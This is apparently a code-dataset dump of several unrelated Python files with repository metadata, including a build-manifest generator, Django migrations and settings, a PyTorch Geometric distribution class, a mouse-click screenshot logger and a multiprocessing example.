with pushd(module_projects_dir.parent / 'manifest'):
# I have no idea why this call is required, but
# 'git diff-index' behaves erratically without it
print(run(['git', 'status'], check=True, stdout=PIPE).stdout)
rc = run(['git', 'diff-index', '--quiet', 'HEAD']).returncode
if rc:
if self.push:
print(f'Pushing updated input manifest upstream... '
f'return code was {rc}')
run([
'git', 'commit', '-am', f'Automated update of '
f'{self.product} from submodules'
], check=True)
run(['git', 'push'], check=True)
else:
print('Skipping push of updated input manifest '
'due to --no-push')
else:
print('Input manifest left unchanged after updating '
'submodules')
def set_relevant_parameters(self):
"""
Determine various key parameters needed to pass on
for building the product
"""
self.product_branch = self.manifest_config.get('branch', 'master')
self.start_build = self.manifest_config.get('start_build', 1)
self.type = self.manifest_config.get('type', 'production')
self.parent = self.manifest_config.get('parent')
self.parent_branch = \
self.manifests.get(self.parent, {}).get('branch', 'master')
# Individual manifests are allowed to have a different
# product setting as well
self.product = self.manifest_config.get('product', self.product)
self.build_job = \
self.manifest_config.get('jenkins_job', f'{self.product}-build')
def set_build_parameters(self):
"""
Determine various build parameters for given input manifest,
namely version and release
"""
build_element = self.input_manifest.find('./project[@name="build"]')
if build_element is None:
print(f'Input manifest {self.manifest} has no "build" project!')
sys.exit(4)
vers_annot = build_element.find('annotation[@name="VERSION"]')
if vers_annot is not None:
self.version = vers_annot.get('value')
print(f'Input manifest version: {self.version}')
else:
self.version = '0.0.0'
print(f'Default version to 0.0.0')
self.release = self.manifest_config.get('release', self.version)
def perform_repo_sync(self):
"""
Perform a repo sync based on the input manifest
"""
product_dir = pathlib.Path(self.product)
top_dir = pathlib.Path.cwd()
if not product_dir.is_dir():
product_dir.mkdir(parents=True)
with pushd(product_dir):
top_level = [
f for f in pathlib.Path().iterdir() if f != '.repo'
]
child: Union[str, Path]
for child in top_level:
shutil.rmtree(child) if child.is_dir() else child.unlink()
run(['repo', 'init', '-u', str(top_dir / 'manifest'), '-g', 'all',
'-m', str(self.manifest)], check=True)
run(['repo', 'sync', '--jobs=6', '--force-sync'], check=True)
def update_bm_repo_and_get_build_num(self):
"""
Update the build-manifests repository checkout, then
determine the next build number to use
"""
bm_dir = pathlib.Path('build-manifests')
if not bm_dir.is_dir():
run(['git', 'clone', f'ssh://git@github.com/'
f'{self.build_manifests_org}/build-manifests'],
check=True)
with pushd(bm_dir):
run(['git', 'reset', '--hard'], check=True)
print('Updating the build-manifests repository...')
run(['git', 'fetch', '--all'], check=True)
self.build_manifest_filename = pathlib.Path(
f'{self.product}/{self.release}/{self.version}.xml'
).resolve()
if self.build_manifest_filename.exists():
last_build_manifest = EleTree.parse(
self.build_manifest_filename
)
last_bld_num_annot = last_build_manifest.find(
'./project[@name="build"]/annotation[@name="BLD_NUM"]'
)
if last_bld_num_annot is not None:
self.last_build_num = int(last_bld_num_annot.get('value'))
self.build_num = max(self.last_build_num + 1, self.start_build)
def generate_changelog(self):
"""
Generate the CHANGELOG file from any changes that have been
found; if none are found and the build is not being forced,
write out the properties files and exit the program
"""
if self.build_manifest_filename.exists():
output = run(['repo', 'diffmanifests', '--raw',
self.build_manifest_filename],
check=True, stdout=PIPE).stdout
# Strip out non-project lines as well as testrunner project
lines = [x for x in output.splitlines()
if not (x.startswith(b' ')
or x.startswith(b'C testrunner'))]
if not lines:
if not self.force:
print(f'No changes since last build {self.version}-'
f'{self.last_build_num}; not executing '
f'new build')
json_file = self.output_files['build-properties.json']
prop_file = self.output_files['build.properties']
with open(json_file) as fh:
json.dump({}, fh)
with open(prop_file) as fh:
fh.write('')
sys.exit(0)
else:
print(f'No changes since last build {self.version}-'
f'{self.last_build_num}, but forcing new '
f'build anyway')
print('Saving CHANGELOG...')
# Need to re-run 'repo diffmanifests' without '--raw'
# to get pretty output
output = run(['repo', 'diffmanifests',
self.build_manifest_filename],
check=True, stdout=PIPE).stdout
with open(self.output_files['CHANGELOG'], 'wb') as fh:
fh.write(output)
def update_build_manifest_annotations(self):
"""
Update the build annotations in the new build manifest
based on the gathered information, also generating a
commit message for later use
"""
build_manifest_dir = self.build_manifest_filename.parent
if not build_manifest_dir.is_dir():
build_manifest_dir.mkdir(parents=True)
def insert_child_annot(parent, name, value):
annot = EleTree.Element('annotation')
annot.set('name', name)
annot.set('value', value)
annot.tail = '\n '
parent.insert(0, annot)
print(f'Updating build manifest {self.build_manifest_filename}')
with open(self.build_manifest_filename, 'w') as fh:
run(['repo', 'manifest', '-r'], check=True, stdout=fh)
last_build_manifest = EleTree.parse(self.build_manifest_filename)
build_element = last_build_manifest.find('./project[@name="build"]')
insert_child_annot(build_element, 'BLD_NUM', str(self.build_num))
insert_child_annot(build_element, 'PRODUCT', self.product)
insert_child_annot(build_element, 'RELEASE', self.release)
version_annot = last_build_manifest.find(
'./project[@name="build"]/annotation[@name="VERSION"]'
)
if version_annot is None:
insert_child_annot(build_element, 'VERSION', self.version)
last_build_manifest.write(self.build_manifest_filename)
return (f"{self.product} {self.release} build {self.version}-"
f"{self.build_num}\n\n"
f"{datetime.now().strftime('%Y/%m/%d %H:%M:%S')} "
f"{time.tzname[time.localtime().tm_isdst]}")
def push_manifest(self, commit_msg):
"""
Push the new build manifest to the build-manifests
repository, but only if it hasn't been disallowed
"""
with pushd('build-manifests'):
run(['git', 'add', self.build_manifest_filename], check=True)
run(['git', 'commit', '-m', commit_msg], check=True)
if self.push:
run(['git', 'push', 'origin', f'HEAD:refs/heads/master'],
check=True)
else:
print('Skipping push of new build manifest due to --no-push')
def copy_build_manifest(self):
"""
Copy the new build manifest to the product directory
and the root directory
"""
print('Saving build manifest...')
shutil.copy(self.build_manifest_filename,
self.output_files['build-manifest.xml'])
# Also keep a copy of the build manifest in the tarball
shutil.copy(self.build_manifest_filename,
pathlib.Path(self.product) / 'manifest.xml')
def create_properties_files(self):
"""
Generate the two properties files (JSON and INI)
from the gathered information
"""
print('Saving build parameters...')
properties = {
'PRODUCT': self.product,
'RELEASE': self.release,
'PRODUCT_BRANCH': self.product_branch,
'VERSION': self.version,
'BLD_NUM': self.build_num,
'MANIFEST': str(self.manifest),
'PARENT': self.parent,
'TYPE': self.type,
'BUILD_JOB': self.build_job,
'FORCE': self.force
}
with open(self.output_files['build-properties.json'], 'w') as fh:
json.dump(properties, fh, indent=2, separators=(',', ': '))
with open(self.output_files['build.properties'], 'w') as fh:
fh.write(f'PRODUCT={self.product}\nRELEASE={self.release}\n'
f'PRODUCT_BRANCH={self.product_branch}\n'
f'VERSION={self.version}\nBLD_NUM={self.build_num}\n'
f'MANIFEST={self.manifest}\nPARENT={self.parent}\n'
f'TYPE={self.type}\nBUILD_JOB={self.build_job}\n'
f'FORCE={self.force}\n')
def create_tarball(self):
"""
Create the source tarball from the repo sync and generated
files (new manifest and CHANGELOG). Avoid copying the .repo
information, and only copy the .git directory if specified.
"""
tarball_filename = self.output_files['source.tar']
targz_filename = self.output_files['source.tar.gz']
print(f'Creating {tarball_filename}')
product_dir = pathlib.Path(self.product)
with pushd(product_dir):
with tarfile.open(tarball_filename, 'w') as tar_fh:
for root, dirs, files in os.walk('.'):
for name in files:
tar_fh.add(os.path.join(root, name)[2:])
for name in dirs:
if name == '.repo' or name == '.git':
dirs.remove(name)
else:
tar_fh.add(os.path.join(root, name)[2:],
recursive=False)
if self.manifest_config.get('keep_git', False):
print(f'Adding Git files to {tarball_filename}')
# When keeping git files, need to dereference symlinks
# so that the resulting .git directories work on Windows.
# Because of this, we don't save the .repo directory
# also, as that would double the size of the tarball
# since mostly .repo just contains git dirs.
with tarfile.open(tarball_filename, "a",
dereference=True) as tar:
for root, dirs, files in os.walk('.', followlinks=True):
for name in dirs:
if name == '.repo':
dirs.remove(name)
elif name == '.git':
tar.add(os.path.join(root, name)[2:],
recursive=False)
if '/.git' in root:
for name in files:
# Git (or repo) sometimes creates broken
# symlinks, like "shallow", and Python's
# tarfile module chokes on those
if os.path.exists(os.path.join(root, name)):
tar.add(os.path.join(root, name)[2:],
recursive=False)
print(f'Compressing {tarball_filename}')
with open(tarball_filename, 'rb') as f_in, \
gzip.open(targz_filename, 'wb') as f_out:
shutil.copyfileobj(f_in, f_out)
os.unlink(tarball_filename)
def generate_final_files(self):
"""
Generate the new files needed, which are:
- new build manifest
- properties files (JSON and INI-style)
- source tarball (which includes the manifest)
"""
self.copy_build_manifest()
self.create_properties_files()
self.create_tarball()
def create_manifest(self):
"""
The orchestration method to handle the full program flow
from a high-level overview. Summary:
- Prepare for various key files, removing any old ones
- Determine the product information from the config files
- Setup manifest repository and determine build information
from it
- If there are submodules, ensure they're updated
- Set the relevant and necessary paramaters (e.g. version)
- Do a repo sync based on the given manifest
- Update the build-manifests repository and determine
the next build number to use
- Generate the CHANGELOG and update the build manifest
annotations
- Push the generated manifest to build-manifests, if
pushing is requested
- Generate the new build manifest, properties files, and
source tarball
"""
self.prepare_files()
self.determine_product_info()
self.do_manifest_stuff()
module_projects = self.manifest_config.get('module_projects')
if module_projects is not None:
self.update_submodules(module_projects)
self.set_relevant_parameters()
self.set_build_parameters()
self.perform_repo_sync()
self.update_bm_repo_and_get_build_num()
with pushd(self.product):
self.generate_changelog()
commit_msg = self.update_build_manifest_annotations()
self.push_manifest(commit_msg)
self.generate_final_files()
def parse_args():
"""Parse and return command line arguments"""
parser = argparse.ArgumentParser(
description='Create new build manifest from input manifest'
)
parser.add_argument('--manifest-project', '-p',
default='git://github.com/minddrive/manifest.git',
help='Alternate Git URL for manifest repository')
parser.add_argument('--build-manifests-org', default='minddrive',
help='Alternate GitHub organization for '
'build-manifests')
parser.add_argument('--force', '-f', action='store_true',
help='Produce new build manifest even if there '
'are no repo changes')
parser.add_argument('--no-push', action='store_true',
help='Do not push final build manifest')
parser.add_argument('manifest', help='Path to input manifest')
return parser.parse_args()
def main():
"""Initialize manifest builder object and trigger the build"""
manifest_builder = ManifestBuilder(parse_args())
manifest_builder.create_manifest()
if __name__ == '__main__':
main()
|
[
"kenneth.lareau@couchbase.com"
] |
kenneth.lareau@couchbase.com
|
7b677664e2d8c491d59f10a622c3e9d6b0b04b4f
|
65e94640b9838d627c0781cab4317858baadc914
|
/item/migrations/0001_initial.py
|
66445d68eb8afc07d45352a4ba0ad90a0d637ee0
|
[] |
no_license
|
Acc-Zidan/airbnb4
|
ccfc2a3b098f5906ef2c0187ac7ef89e98552af9
|
1e74f3b9a9b9aa7fb2ae1c055128d549067a4abc
|
refs/heads/main
| 2023-03-01T21:01:19.318547
| 2021-02-09T18:34:42
| 2021-02-09T18:34:42
| 328,228,669
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,710
|
py
|
# Generated by Django 3.1.5 on 2021-01-22 19:20
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Category',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=50)),
],
),
migrations.CreateModel(
name='Item',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=100)),
('image', models.ImageField(upload_to='Item/')),
('price', models.IntegerField(default=0)),
('description', models.TextField(max_length=10000)),
('category', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='item_category', to='item.category')),
],
),
migrations.CreateModel(
name='Place',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=50)),
('image', models.ImageField(upload_to='place/')),
],
),
migrations.CreateModel(
name='ItemReview',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('rate', models.IntegerField(default=0)),
('feedback', models.CharField(max_length=2000)),
('created_at', models.DateTimeField(default=django.utils.timezone.now)),
('auther', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='review_auther', to=settings.AUTH_USER_MODEL)),
('item', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='review_item', to='item.item')),
],
),
migrations.CreateModel(
name='ItemImages',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('image', models.ImageField(upload_to='ItemImages/')),
('item', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='item_images', to='item.item')),
],
),
migrations.CreateModel(
name='Itembook',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('date_from', models.DateField(default=django.utils.timezone.now)),
('date_to', models.DateField(default=django.utils.timezone.now)),
('qnty', models.IntegerField(default=1)),
('item', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='book_item', to='item.item')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='book_owner', to=settings.AUTH_USER_MODEL)),
],
),
migrations.AddField(
model_name='item',
name='place',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='item_place', to='item.place'),
),
]
|
[
"ahmedzidan858@gmail.com"
] |
ahmedzidan858@gmail.com
|
10329cd8754e9c98706dbaac2a3fdf61e41158c0
|
000144b20bfd717d223c088847de9479ca23c499
|
/djangorq_project/wsgi.py
|
d1fa13347e41771775c75bc8cc6769d7b61d572b
|
[] |
no_license
|
stuartmaxwell/django-django_rq-advanced-example
|
cfbb8ea83d28354def6fa4787a18718507a422db
|
f9c88b4fa5c4377143fb9986888c11adf95c57ef
|
refs/heads/master
| 2022-12-03T15:00:47.284986
| 2020-08-03T09:38:50
| 2020-08-03T09:38:50
| 260,836,030
| 3
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 409
|
py
|
"""
WSGI config for djangorq_project project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "djangorq_project.settings")
application = get_wsgi_application()
|
[
"stuart@tpad.amanzi.local"
] |
stuart@tpad.amanzi.local
|
21fb9340d7f32f6154426ff550bec28acbfdafb6
|
203d90b6f0a0fe38cf6a77d50c6e5aa528e4d50d
|
/blog/models.py
|
4398a5455471cb25c799d12afc32868947063c59
|
[] |
no_license
|
leayl/mysite
|
dcc92bedc27b6206ec566f5b4421ee517a838ddd
|
b7974ce9fffe5c4f61d1c0d4facdd7c7860c0204
|
refs/heads/master
| 2021-06-23T23:53:39.046179
| 2019-09-23T03:51:45
| 2019-09-23T03:51:45
| 181,919,893
| 0
| 0
| null | 2021-06-10T21:23:46
| 2019-04-17T15:31:54
|
Python
|
UTF-8
|
Python
| false
| false
| 1,109
|
py
|
from django.contrib.contenttypes.models import ContentType
from django.db import models
from django.db.models.fields import exceptions
from django.contrib.auth.models import User
from ckeditor_uploader.fields import RichTextUploadingField
from read_statistics.models import ReadNumExtendMethod
class BlogType(models.Model):
title = models.CharField(max_length=32)
def __str__(self):
return self.title
class Blog(models.Model,ReadNumExtendMethod):
"""
继承了read_statistics.models中的ReadNumExtendMethod
获得get_read_num方法,可在admin中直接使用显示在后台
"""
title = models.CharField(max_length=32)
blog_type = models.ForeignKey(BlogType, on_delete=models.DO_NOTHING)
content = RichTextUploadingField()
author = models.ForeignKey(User, on_delete=models.DO_NOTHING)
# read_times = models.IntegerField(default=0)
created_time = models.DateTimeField(auto_now_add=True)
last_update_time = models.DateTimeField(auto_now=True)
def __str__(self):
return self.title
class Meta:
ordering=['-created_time']
|
[
"lea_yl@163.com"
] |
lea_yl@163.com
|
e0cca89f4a4f404016bb78405ab89923c78dd493
|
9efe0d0773bddc264b9598bf1cb16f821dd0ed9c
|
/detect.py
|
f2ec8cc08dde54b5e1bd55dcab9e3f4285d4d5dc
|
[
"MIT"
] |
permissive
|
chaosparrot/icuclick
|
08ecacda1ca663a653ec8d9b3233ad8dc264262a
|
2ca7f3446bcddbd03aa3211a544427c826809444
|
refs/heads/master
| 2020-07-06T04:08:16.090683
| 2019-08-25T09:10:39
| 2019-08-25T09:10:39
| 202,886,525
| 2
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,656
|
py
|
# Code to check if left or right mouse buttons were pressed
import win32api
import time
import pyautogui
import numpy
from win32gui import WindowFromPoint, GetWindowRect
pyautogui.PAUSE = 0
pyautogui.FAILSAVE = False
state_left = win32api.GetKeyState(0x01) # Left button down = 0 or 1. Button up = -127 or -128
state_right = win32api.GetKeyState(0x02) # Right button down = 0 or 1. Button up = -127 or -128
large_movement_picture = None
movement_start_time = None
previous_position = pyautogui.position()
window_bounds = GetWindowRect( WindowFromPoint( (0, 0) ) )
window_bounds_text = '[' + ','.join(str(x) for x in window_bounds) + ']'
while True:
a = win32api.GetKeyState(0x01)
b = win32api.GetKeyState(0x02)
position = pyautogui.position()
if a != state_left: # Button state changed
state_left = a
pic = pyautogui.screenshot()
if a < 0:
# Keep the window bounds only when holding down the mouse button, because the windows size can change based on releasing the mouse button
window_bounds = GetWindowRect( WindowFromPoint( position ) )
window_bounds_text = '[' + ','.join(str(x) for x in window_bounds) + ']'
pic.save('data/raw/' + str( int( time.time() * 100 ) ) + '--(' + str(position[0]) + '-' + str(position[1]) + ')--' + window_bounds_text + '--mousedown.png')
print('Saving mousedown screenshot')
else:
pic.save('data/raw/' + str( int( time.time() * 100 ) ) + '--(' + str(position[0]) + '-' + str(position[1]) + ')--' + window_bounds_text + '--mouseup.png')
print( "Saving mouseup screenshot" )
if large_movement_picture is not None:
large_movement_picture.save('data/raw/' + str( int( movement_start_time * 100 ) ) + '--(' + str(position[0]) + '-' + str(position[1]) + ')--' + window_bounds_text + '--mousemove.png')
print( "Saving mousemovement screenshot" )
large_movement_picture = None
movement_start_time = None
if b != state_right: # Button state changed
state_right = b
#print(b)
#if b < 0:
#print('Right Button Pressed')
#else:
#print('Right Button Released')
# Large movement detection
xDistance = numpy.linalg.norm(previous_position[0]-position[0])
yDistance = numpy.linalg.norm(previous_position[1]-position[1])
if( xDistance + yDistance > 10 ):
large_movement_picture = pyautogui.screenshot()
movement_start_time = time.time()
print( "Detecting large movement - " + str( xDistance + yDistance ) )
previous_position = position
|
[
"kevinteraa@gmail.com"
] |
kevinteraa@gmail.com
|
06ebfc7c0dd8d9fa2e442b989356c0541f537915
|
e4eca3e87148f9afc93233b13c54c5e065f704b1
|
/pyMRA/multiprocess/example.py
|
6729aaca6a0ed1bb1006d371176603e55628d452
|
[
"MIT"
] |
permissive
|
katzfuss-group/pyMRA
|
51dddfcba457e5ebf76f6a9bbe69d7efa2208cb4
|
6214f2a89b5abb6dce3f3187692bea88874a4649
|
refs/heads/master
| 2021-04-03T04:12:37.142914
| 2018-03-09T15:40:35
| 2018-03-09T15:40:35
| 124,594,147
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,749
|
py
|
import multiprocessing
import sys
import re
class ProcessWorker(multiprocessing.Process):
"""
This class runs as a separate process to execute worker's commands in parallel
Once launched, it remains running, monitoring the task queue, until "None" is sent
"""
def __init__(self, task_q, result_q):
multiprocessing.Process.__init__(self)
self.task_q = task_q
self.result_q = result_q
return
def run(self):
"""
Overloaded function provided by multiprocessing.Process. Called upon start() signal
"""
proc_name = self.name
print( '%s: Launched' % (proc_name))
while True:
next_task_list = self.task_q.get()
if next_task is None:
# Poison pill means shutdown
print('%s: Exiting' % (proc_name))
self.task_q.task_done()
break
next_task = next_task_list[0]
print( '%s: %s' % (proc_name, next_task))
args = next_task_list[1]
kwargs = next_task_list[2]
answer = next_task(*args, **kwargs)
self.task_q.task_done()
self.result_q.put(answer)
return
# End of ProcessWorker class
class Worker(object):
"""
Launches a child process to run commands from derived classes in separate processes,
which sit and listen for something to do
This base class is called by each derived worker
"""
def __init__(self, config, index=None):
self.config = config
self.index = index
# Launce the ProcessWorker for anything that has an index value
if self.index is not None:
self.task_q = multiprocessing.JoinableQueue()
self.result_q = multiprocessing.Queue()
self.process_worker = ProcessWorker(self.task_q, self.result_q)
self.process_worker.start()
print( "Got here")
# Process should be running and listening for functions to execute
return
def enqueue_process(target): # No self, since it is a decorator
"""
Used to place an command target from this class object into the task_q
NOTE: Any function decorated with this must use fetch_results() to get the
target task's result value
"""
def wrapper(self, *args, **kwargs):
self.task_q.put([target, args, kwargs]) # FAIL: target is a class instance method and can't be pickled!
return wrapper
def fetch_results(self):
"""
After all processes have been spawned by multiple modules, this command
is called on each one to retreive the results of the call.
This blocks until the execution of the item in the queue is complete
"""
self.task_q.join() # Wait for it to to finish
return self.result_q.get() # Return the result
@enqueue_process
def run_long_command(self, command):
print( "I am running number % as process "%number, self.name )
# In here, I will launch a subprocess to run a long-running system command
# p = Popen(command), etc
# p.wait(), etc
return
def close(self):
self.task_q.put(None)
self.task_q.join()
if __name__ == '__main__':
config = ["some value", "something else"]
index = 7
workers = []
for i in range(5):
worker = Worker(config, index)
worker.run_long_command("ls /")
workers.append(worker)
for worker in workers:
worker.fetch_results()
# Do more work... (this would actually be done in a distributor in another class)
for worker in workers:
worker.close()
|
[
"marcinjurek1988@gmail.com"
] |
marcinjurek1988@gmail.com
|
f6a223d328e72ba600c445072360b528c214a1e7
|
35ef5e728116fc66d0b75656be2f26786348b14a
|
/accounts/migrations/0006_contact_create_date.py
|
06dcda1b829ebc66c72d66a79ac32633ba63d638
|
[] |
no_license
|
ahmedyasin21/believer
|
e16d1c2c36cca12291d57d923cc39b5458ec1a5a
|
4ce02c0f7f090ea02222c6a7396be2a9fd741295
|
refs/heads/main
| 2023-08-20T04:43:39.976198
| 2021-11-01T07:50:39
| 2021-11-01T07:50:39
| 423,379,714
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 444
|
py
|
# Generated by Django 3.0.3 on 2020-10-01 10:35
from django.db import migrations, models
import django.utils.timezone
class Migration(migrations.Migration):
dependencies = [
('accounts', '0005_auto_20201001_0148'),
]
operations = [
migrations.AddField(
model_name='contact',
name='create_date',
field=models.DateTimeField(default=django.utils.timezone.now),
),
]
|
[
"coolahmed21@example.com"
] |
coolahmed21@example.com
|
9ff12a83fa349c141961c33c8bda172be333ee74
|
89108805110edac6d07de41130a9bc45d62efb9d
|
/mailinglist_registration/backends/messages/views.py
|
7e5ac56aa132db7d8dfe58368d69d8731b85b4c5
|
[
"BSD-3-Clause"
] |
permissive
|
danielpatrickdotdev/django-mailinglist-registration
|
7824aaa6232ebfe5de5e3dc65a19cc707b6b4686
|
756c4ac2052063249b66eaa4c153694a5fb3eba1
|
refs/heads/master
| 2021-05-27T17:56:54.917761
| 2013-07-13T12:29:01
| 2013-07-13T12:29:01
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,919
|
py
|
from django.conf import settings
from django.shortcuts import redirect
from django.contrib.sites.models import RequestSite, Site
from django.contrib import messages
from django.views.generic.base import TemplateView
from mailinglist_registration import signals
from mailinglist_registration.models import RegistrationProfile, Subscriber
from mailinglist_registration.views import ActivationView as BaseActivationView
from mailinglist_registration.views import RegistrationView as BaseRegistrationView
class RegistrationView(BaseRegistrationView):
def register(self, request, **cleaned_data):
"""
Given an email address, register a new subscriber, which will
initially be inactive.
Along with the new ``Subscriber`` object, a new
``mailinglist_registration.models.RegistrationProfile`` will be created,
tied to that ``Subscriber``, containing the activation key which
will be used for this account.
An email will be sent to the supplied email address; this
email should contain an activation link. The email will be
rendered using two templates. See the documentation for
``RegistrationProfile.send_activation_email()`` for
information about these templates and the contexts provided to
them.
After the ``Subscriber`` and ``RegistrationProfile`` are created and
the activation email is sent, the signal
``mailinglist_registration.signals.subscriber_registered`` will
be sent, with the new ``Subscriber`` as the keyword argument
``subscriber`` and the class of this backend as the sender.
"""
email = cleaned_data['email']
if Site._meta.installed:
site = Site.objects.get_current()
else:
site = RequestSite(request)
subscriber = RegistrationProfile.objects.create_inactive_subscriber(email, site)
signals.subscriber_registered.send(sender=self.__class__,
subscriber=subscriber,
request=request)
return subscriber
def registration_allowed(self, request):
"""
In order to keep this backend simple, registration is always open.
"""
return True
def form_valid(self, request, form):
new_subscriber = self.register(request, **form.cleaned_data)
success_url = self.get_success_url(request, new_subscriber)
messages.info(self.request,"Thanks for signing up to our updates! Please check your emails to confirm your email address.")
# success_url may be a simple string, or a tuple providing the
# full argument set for redirect(). Attempting to unpack it
# tells us which one it is.
try:
to, args, kwargs = success_url
return redirect(to, *args, **kwargs)
except ValueError:
return redirect(success_url)
class ActivationView(TemplateView):
"""
Base class for subscriber activation views.
"""
success_url = None
http_method_names = ['get']
def get(self, request, *args, **kwargs):
activated_subscriber = self.activate(request, *args, **kwargs)
if activated_subscriber:
messages.success(request,"Your email address has been confirmed. Thank you for subscribing to our updates!")
success_url = self.get_success_url(request, activated_subscriber)
try:
to, args, kwargs = success_url
return redirect(to, *args, **kwargs)
except ValueError:
return redirect(success_url)
else:
messages.error(request,"Hmm. Something went wrong somewhere. Maybe the activation link expired?")
success_url = self.get_success_url(request, activated_subscriber)
return redirect(success_url)
def activate(self, request, activation_key):
"""
Given an an activation key, look up and activate the subscriber
account corresponding to that key (if possible).
After successful activation, the signal
``mailinglist_registration.signals.subscriber_activated`` will be sent, with the
newly activated ``Subscriber`` as the keyword argument ``subscriber`` and
the class of this backend as the sender.
"""
activated_subscriber = RegistrationProfile.objects.activate_subscriber(activation_key)
if activated_subscriber:
signals.subscriber_activated.send(sender=self.__class__,
subscriber=activated_subscriber,
request=request)
return activated_subscriber
def get_success_url(self, request, subscriber):
return self.success_url
class DeRegistrationView(TemplateView):
success_url = None
def get(self, request, deactivation_key, *args, **kwargs):
"""
Given an a deactivation key, look up and deactivate the subscriber
account corresponding to that key (if possible).
After successful deactivation, the signal
``mailinglist_registration.signals.subscriber_deactivated`` will be sent, with the
email of the deactivated ``Subscriber`` as the keyword argument ``email`` and
the class of this backend as the sender.
"""
email = Subscriber.objects.deactivate_subscriber(deactivation_key)
if email:
signals.subscriber_deactivated.send(sender=self.__class__,
email=email,
request=request)
messages.info(request,"Your email address has been removed from our mailing list.")
else:
messages.error(request,"Are you sure you typed that URL correctly?")
return redirect(self.success_url)
|
[
"danielpatrick@hotmail.com"
] |
danielpatrick@hotmail.com
|
8bab37daf96d71aa280e74d681d7515f1291bf03
|
c9f67529e10eb85195126cfa9ada2e80a834d373
|
/lib/python3.5/site-packages/torch/distributions/geometric.py
|
1e4b121cd7b4cfcccd548bf86ff634e3392b7ebe
|
[
"Apache-2.0"
] |
permissive
|
chilung/dllab-5-1-ngraph
|
10d6df73ea421bfaf998e73e514972d0cbe5be13
|
2af28db42d9dc2586396b6f38d02977cac0902a6
|
refs/heads/master
| 2022-12-17T19:14:46.848661
| 2019-01-14T12:27:07
| 2019-01-14T12:27:07
| 165,513,937
| 0
| 1
|
Apache-2.0
| 2022-12-08T04:59:31
| 2019-01-13T14:19:16
|
Python
|
UTF-8
|
Python
| false
| false
| 2,923
|
py
|
from numbers import Number
import torch
from torch.distributions import constraints
from torch.distributions.distribution import Distribution
from torch.distributions.utils import broadcast_all, probs_to_logits, logits_to_probs, lazy_property, _finfo
from torch.nn.functional import binary_cross_entropy_with_logits
class Geometric(Distribution):
r"""
Creates a Geometric distribution parameterized by `probs`, where `probs` is the probability of success of Bernoulli
trials. It represents the probability that in k + 1 Bernoulli trials, the first k trials failed, before
seeing a success.
Samples are non-negative integers [0, inf).
Example::
>>> m = Geometric(torch.tensor([0.3]))
>>> m.sample() # underlying Bernoulli has 30% chance 1; 70% chance 0
2
[torch.FloatTensor of size 1]
Args:
probs (Number, Tensor): the probabilty of sampling `1`. Must be in range (0, 1]
logits (Number, Tensor): the log-odds of sampling `1`.
"""
arg_constraints = {'probs': constraints.unit_interval}
support = constraints.nonnegative_integer
def __init__(self, probs=None, logits=None, validate_args=None):
if (probs is None) == (logits is None):
raise ValueError("Either `probs` or `logits` must be specified, but not both.")
if probs is not None:
self.probs, = broadcast_all(probs)
if not self.probs.gt(0).all():
raise ValueError('All elements of probs must be greater than 0')
else:
self.logits, = broadcast_all(logits)
probs_or_logits = probs if probs is not None else logits
if isinstance(probs_or_logits, Number):
batch_shape = torch.Size()
else:
batch_shape = probs_or_logits.size()
super(Geometric, self).__init__(batch_shape, validate_args=validate_args)
@property
def mean(self):
return 1. / self.probs - 1.
@property
def variance(self):
return (1. / self.probs - 1.) / self.probs
@lazy_property
def logits(self):
return probs_to_logits(self.probs, is_binary=True)
@lazy_property
def probs(self):
return logits_to_probs(self.logits, is_binary=True)
def sample(self, sample_shape=torch.Size()):
shape = self._extended_shape(sample_shape)
with torch.no_grad():
u = self.probs.new(shape).uniform_(_finfo(self.probs).tiny, 1)
return (u.log() / (-self.probs).log1p()).floor()
def log_prob(self, value):
if self._validate_args:
self._validate_sample(value)
value, probs = broadcast_all(value, self.probs.clone())
probs[(probs == 1) & (value == 0)] = 0
return value * (-probs).log1p() + self.probs.log()
def entropy(self):
return binary_cross_entropy_with_logits(self.logits, self.probs, reduce=False) / self.probs
|
[
"chilung.cs06g@nctu.edu.tw"
] |
chilung.cs06g@nctu.edu.tw
|
ddd780af0f467b3e365ab91cc4e73b3afe4f785c
|
b58c3f5b69772d5383727b8257536ab41a29cd02
|
/testsuites/test03_shopmanage.py
|
c3344499a4f13305952624af0de7a9e677e12957
|
[] |
no_license
|
pwxing/LinkeDs
|
b25fe937100b352f00f152306f7b15691c69f41e
|
2f996a70cd611eef27a826ae7ded38104e292374
|
refs/heads/master
| 2021-05-07T18:36:27.877468
| 2017-11-02T12:20:34
| 2017-11-02T12:20:34
| 108,817,025
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,936
|
py
|
# coding=utf-8
import time
import unittest
from framework.browser_engine import BrowserEngine
